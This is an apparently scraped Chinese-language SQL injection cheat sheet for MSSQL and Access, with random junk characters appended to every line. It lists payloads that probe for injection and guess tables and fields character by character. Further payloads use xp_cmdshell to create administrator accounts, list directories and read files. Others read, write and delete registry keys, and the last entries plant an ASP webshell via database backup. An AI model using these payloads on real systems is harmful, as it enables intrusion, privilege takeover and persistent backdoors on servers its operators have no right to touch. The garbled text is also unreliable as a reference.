1.判断是否有注入;and 1=1 ;and 1=2 /y~ "n4CK~
2.初步判断是否是mssql ;and user>0 (g>>
`NNr]__
3.注入参数是字符'and [查询条件] and ''=' sVjM^y24
4?s
~S. %
4.搜索时没过滤参数的'and [查询条件] and '%25'=' @C34^\aH+
zld[uhc>
5.判断数据库系统 N-g=_86C"
!gm;g}]szG
;and (select count(*) from sysobjects)>0 mssql %1Pn;bUU!
V7\@g
;and (select count(*) from msysobjects)>0 access E"|LA[o
;jEDGKLq
^3B&E^R
cGVIO"(VP
6.猜数据库 ;and (select Count(*) from [数据库名])>0 wx,yx3c (
L-}6}5[
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 snW=9b)m
H]XY
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 M-Tjp'=*
8LMO2Wyq
9.(1)猜字段的ascii值(access) 37SbF,G
1oSrhUTy
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 H(~:Ajj+zQ
v9t26>{~
(2)猜字段的ascii值(mssql) FYs-vW {
.P|_C.3-l
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #EO@<>I
Rz Os,
10.测试权限结构(mssql) P&s-U6
/2n-q_
*QIlh""6
1zDat@<H
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ~KW|<n4m
!FqJP
OGm
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- :U}.
122%KS
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- B`)gXqBt
w4m)lQM
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- BXCB/:0
4NY}=e5
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- / X
#4
m~#f L
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- L>&o_bzp
%l#i9$s
;and 1=(select IS_MEMBER('db_owner'));-- =Z3{6y}3p
j`'9;7h M6
OVo3.
%]2hxTV
11.添加mssql和系统的帐户 0I`)<o-
vSOO[.=
;exec master.dbo.sp_addlogin username;-- 2+2Gl7" s
;exec master.dbo.sp_password null,username,password;-- #s\HiO$BT
_5nS!CN
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- P0B`H7D
_ \d[`7#
;exec master.dbo.xp_cmdshell 'net user username password Vw^2TRU
Mj
guH5Uy
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Mx3MNX/
2~*J<iO&l
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ;yvx -
Q1A_hW2 x
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Z8 X=Md8=
zA
; 7Nv$3
GQ@`qYLZ+
l8XgzaW
12.(1)遍历目录 = 02$Dwr
[eWZ^Eh"I
;create table dirs(paths varchar(100), id int) ?F^$4:
xzZ2?zWi
;insert dirs exec master.dbo.xp_dirtree 'c:\' MsaD@JY.y
@d+NeS
;and (select top 1 paths from dirs)>0
_i/x4,=xv
EO_:C9=d{
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) a7]wPXKq
%OIJ.
s9Tp(Yr,k
isG8S(}IW&
(2)遍历目录 .~nk'm
XtJIaD|:3
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- \W,,@-
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 (R9{wGV [
i-<1M|f
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 -E$(<Pow~\
Ao0p=@Y
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 k%|Sl>{Ir
1 +0-VRl
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 xy^t_];X
NMM$
m!zg
b%-S'@ew
__3s3YG
13.mssql中的存储过程 /O^aFIxk
G2 E4
xp_regenumvalues 注册表根键, 子键 Fv<^\q
wm'a)B?
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 'o!{YLJ fM
zc`gm~@
xp_regread 根键,子键,键值名 or8`.hEHI
6dNW2_
;exec xp_regread TEzMFu+V
Sb/`a~q^
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 k6}M7&nY
vGX}zzto
xp_regwrite 根键,子键, 值名, 值类型, 值 &P0jRT3e#Y
+D@+j
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 _ddOsg|U
BQ;F`!Hx?
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ld7B!_b<
_oILZ,
xp_regdeletevalue 根键,子键,值名 UGb<&)
)Z=S'm
k4_
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 t++
a
u alpm#GU
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 _=\J :r|Y:
M SnRx*-
%$*WdK#
#H5i$ o
14.mssql的backup创建webshell }#<mK3MBe
5fT"`FL?
use model )&") J}@
blk4@pg
create table cmd(str image); n|M~C\*
=-m"y~{>3
insert into cmd(str) values (''); O u-/dE%
o?O> pK
backup database model to disk='c:\l.asp'; v]?zG&Jh
XzD+#+By
wyi%!H
uE]Z,`e
15.mssql内置函数 #GbfFoE
(X3}&aLF
;and (select @@version)>0 获得Windows的版本号 hRFm]q
~x-v%x6
;and user_name()='dbo' 判断当前系统的连接用户是不是sa z#|tcHVFT
`:Bm@eN
;and (select user_name())>0 爆当前系统的连接用户 n([9U0!gu
QSNPraT
;and (select db_name())>0 得到当前连接的数据库 v(`9+*
tZL {;@
>3qfo2K0
iRIO~XVo
16.简洁的webshell %jErLg
N87)rhXSo,
use model `bJ?8~ 8*
nSr_sD6"
create table cmd(str image); m 5_
!zZ3F|+HB
insert into cmd(str) values (''); 8-&c%h
1
R8%%EEB
backup database model to disk='g:\wwwtest\l.asp';